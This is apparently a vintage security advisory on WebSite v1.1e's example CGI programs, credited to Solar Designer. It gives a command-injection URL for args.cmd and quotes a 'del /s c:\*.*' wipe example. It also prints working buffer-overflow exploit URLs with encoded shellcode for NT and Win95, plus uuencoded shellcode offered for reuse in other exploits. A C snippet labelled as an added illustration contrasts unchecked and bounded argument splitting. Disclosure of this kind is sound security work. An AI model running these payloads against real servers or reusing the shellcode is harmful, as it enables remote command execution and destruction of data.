COMMAND
buffer overflow
SYSTEMS AFFECTED
WinNT, Win95
PROBLEM
There are several security holes in WebSite v1.1e for Windows NT
and '95, in the CGI example programs.
The first thing you will notice about the scripts is that they
have the following lines in cgi-dos/args.cmd (and some others):
rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider
rem a query string of xxx&del+/s+c:\*.* Your hard drive gets
rem erased!! Same goes for args and extra path info!!!
and then some lines like this:
echo QUERY_STRING="%QUERY_STRING%"
The exploit can be:
http://website.host/cgi-dos/args.cmd?"&any+dos+command"
There's also an example C program, compiled to
cgi-shl/win-c-sample.exe, with the source provided in
cgi-src/win-c-sample/win-c-sample.c, and the following line in
there:
char *argv[32]; // Max 32 command line args
That's a WinMain local variable, and it is passed to SplitArgs(),
which does no bounds checking while filling it with the command
line parameters. You know what that means: a nice buffer
overflow.
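The missing bounds check, as an added illustration that is not the advisory's or WebSite's own code (the names split_args_unchecked, split_args_bounded and bounded_arg_count are assumed): the unchecked splitter mirrors the defect described above, while the bounded one refuses a command line with more than 32 tokens instead of writing past the array.

```c
#include <string.h>

#define MAX_ARGS 32  /* same capacity as the page's "char *argv[32]" */

/* Unchecked splitter, mirroring the defect: every space-separated token
 * is stored with no check against the capacity, so more than MAX_ARGS
 * tokens write past argv. Kept for comparison; never give it untrusted input. */
int split_args_unchecked(char *cmdline, char *argv[MAX_ARGS])
{
    int argc = 0; char *p = cmdline;
    while (*p) {
        while (*p == ' ') p++;
        if (!*p) break;
        argv[argc++] = p;            /* no bound on argc */
        while (*p && *p != ' ') p++;
        if (*p) *p++ = '\0';
    }
    return argc;
}

/* Bounded splitter: returns the number of tokens stored, or -1 when the
 * command line holds more than max_args tokens (caller rejects the request). */
int split_args_bounded(char *cmdline, char *argv[], size_t max_args)
{
    size_t argc = 0; char *p = cmdline;
    while (*p) {
        while (*p == ' ') p++;
        if (!*p) break;
        if (argc >= max_args) return -1;   /* the check SplitArgs() lacks */
        argv[argc++] = p;
        while (*p && *p != ' ') p++;
        if (*p) *p++ = '\0';
    }
    return (int)argc;
}

/* Builds a constructed command line of n "-" tokens separated by spaces
 * (a "+-+-+-..." query string after '+' decodes to a space) and splits it. */
int bounded_arg_count(size_t n)
{
    char line[4096];
    char *argv[MAX_ARGS];
    size_t i;
    if (2 * n >= sizeof line) return -2;
    for (i = 0; i < n; i++) { line[2 * i] = '-'; line[2 * i + 1] = ' '; }
    line[2 * n] = '\0';
    return split_args_bounded(line, argv, MAX_ARGS);
}
```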
Here are the exploits (Solar split the long URLs into several
lines); you can use any DOS command in them (replace spaces with
_'s):
WinNT (any version?):
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%
FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy
_\WebSite\readme.1st_\WebSite\htdocs\x1.htm
Win95 (the release version only, will crash others!):
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0
3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\
x1.htm
The example DOS commands just copy WebSite's readme.1st file,
so you can later check whether the exploit worked by requesting
http://website.host/x1.htm. Note that the server should respond
to these exploits with an "Error: no blank line separating header
and data", because the "1 file(s) copied" message appears
without the blank line before it that HTTP requires (if you need
a command's output, you can redirect it to a file and fetch that
file via HTTP with a separate request).
The approach Solar used in the exploits above is calling kernel
functions at fixed offsets. Actually, the WinNT exploit does pattern
searches in the kernel (because of the number of different kernel
versions out there), while the Win95 one uses fixed offsets
(Solar doesn't have Win95 himself; thanks go to Lord Byte for
loading his WinIce and telling him the offsets). The two
functions used are WinExec and ExitProcess.
Here are the two shellcodes in binary, uuencoded, so you can use
them in your own exploits if you wish.
begin 644 shell_nt.bin
M:%Y8_^;_U(/&3&H!5HH&/%]U`X`N/T9!283`=?!H,!#P=UEH35QY6U@%,%!Z
F4$$Y`77P@^D0_]%H,!#P=UEHT%!V3%@%,#!V4$$Y`77P@^D<_]'[
`
end
begin 644 shell_95.bin
M:%Y8_^;_U(/&,FH!5HH&/%]U`X`N/T9!283`=?"Z=&]\7[ET8'U@`\K_T;I8
,7WQ?N5A0?&`#RO_1
`
end
Credit for this discovery goes to Solar Designer.
SOLUTION
Just remove the examples after you, the Webmaster, have checked
them out. Also, the holes will probably get fixed in the next
WebSite release.